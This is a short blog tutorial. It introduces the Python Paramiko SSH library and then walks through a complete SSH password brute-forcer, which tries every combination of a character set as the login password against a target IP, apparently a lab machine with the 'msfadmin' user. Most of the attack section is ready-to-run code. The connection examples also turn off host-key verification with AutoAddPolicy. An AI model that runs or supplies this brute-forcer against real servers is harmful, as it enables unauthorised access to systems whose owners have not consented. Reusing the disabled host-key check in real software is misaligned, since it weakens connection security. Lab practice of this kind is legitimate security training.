Python SSH Bruteforcer

Posted on November 3, 2022 by Tom Rosenzweig ‐ 4 min read

What is Paramiko?

Paramiko is a Python implementation of SSH (Secure Shell) protocol which allows Python programs to establish secure connections to remote servers. Here’s how you can install Paramiko and some basic usage instructions:

Installation

You can install Paramiko using pip, the package installer for Python. To install the latest version of Paramiko, run the following command:

pip install paramiko

Basic Usage

First, you need to import the Paramiko library in your Python script:

import paramiko

Establish an connection

Let’s uses the Paramiko library to establish an SSH connection to a remote server.

The first step is to import the Paramiko library in your Python script.

 import paramiko

Define connection parameters

Next, define the connection parameters like IP address, username, and password of the remote server you want to connect to.

ip = '192.168.198.136'
username = 'ubuntu'
password = 'pa$$w0rd'
timeout = 5

In this example, we are using IP address 192.168.198.136 with ubuntu as the username and pa$$w0rd as the password. We are also setting a timeout value of 5 seconds.

Set up the SSH client

Create an instance of the SSHClient class and set the missing_host_key_policy attribute to AutoAddPolicy. This will automatically add the remote server’s SSH key to the local machine’s list of known hosts.

client_policy = paramiko.AutoAddPolicy()
client = paramiko.SSHClient();
client.set_missing_host_key_policy(client_policy)

Connect to the remote server

Use the connect() method of the SSH client instance to establish an SSH connection with the remote server.

client.connect(ip, username=username, password=password, timeout=timeout)

In this example, we are passing the IP address, username, password, and timeout value to the connect() method.

Print the SSH client object

Finally, print the SSH client object to verify that the connection has been established successfully.

print(client)

Close the connection

After you are finished with the connection, you should close it to free up system resources.

client.close()

Bruteforce SSH

This is an example of a brute force attack using the Paramiko library to attempt to log in to an SSH server. The script creates a client object, defines a Brutes class that generates password guesses, and tries to connect to the SSH server using each password guess until the correct one is found.

Here are the steps to understand this script:

Libraries

import itertools as it
import string
from utils import timefunc
import paramiko

This code imports the necessary libraries, including itertools, string, timefunc from the utils module, and paramiko.

Define the create_client function

def create_client():
    client = paramiko.SSHClient()
    client_policy = paramiko.AutoAddPolicy()
    client.set_missing_host_key_policy(client_policy)
    return client

This function creates an SSH client object using the paramiko library, sets the client’s policy to auto-add any new host key, and returns the client object.

Define the Brutes class

class Brutes:
    def __init__(self, charset, length, ip):
        self.charset = charset
        self.length = length
        self.ip = ip
    
    @timefunc
    def crackit(self, username):
        client = create_client()
        for guess in self.guesses:
            try:
                print(guess)
                client.connect(self.ip, username=username, password=guess, timeout=0.5)
                print('The password is {}'.format(guess))
                return guess
            except paramiko.AuthenticationException as e:
                print('{} is not it.'.format(guess)) 
            finally:
                client.close()
    
    @property
    def guesses(self):
        for guess in it.product(self.charset, repeat=self.length):
            yield ''.join(guess)

This class takes in three arguments: the character set used to generate password guesses, the length of the password guesses, and the IP address of the target SSH server. The crackit method attempts to connect to the SSH server using each password guess generated by the guesses property until the correct password is found or all guesses have been exhausted. The guesses property generates all possible combinations of the characters in the character set for the given length.

Define the main function

def main():
    charset = 'aspeb'#'pqrstuvwxyzabcdefghijklmno'
    ip = '10.0.13.231'
    brute = Brutes(charset, 4, ip)
    password = brute.crackit(username='msfadmin')
    if password:
        print('Found {}'.format(password))

This function sets the character set, IP address, and length of the password guesses, creates a Brutes object, and attempts to crack the SSH password for the specified username. If the password is found, it is printed to the console.

Run the code

if __name__ == '__main__':
    main()

Python SSH Bruteforcer

What is Paramiko? #

Installation #

Basic Usage #

Establish an connection #

Define connection parameters #

Set up the SSH client #

Connect to the remote server #

Print the SSH client object #

Close the connection #

Bruteforce SSH #

Libraries #

Define the create_client function #

Define the Brutes class #

Define the main function #

Run the code #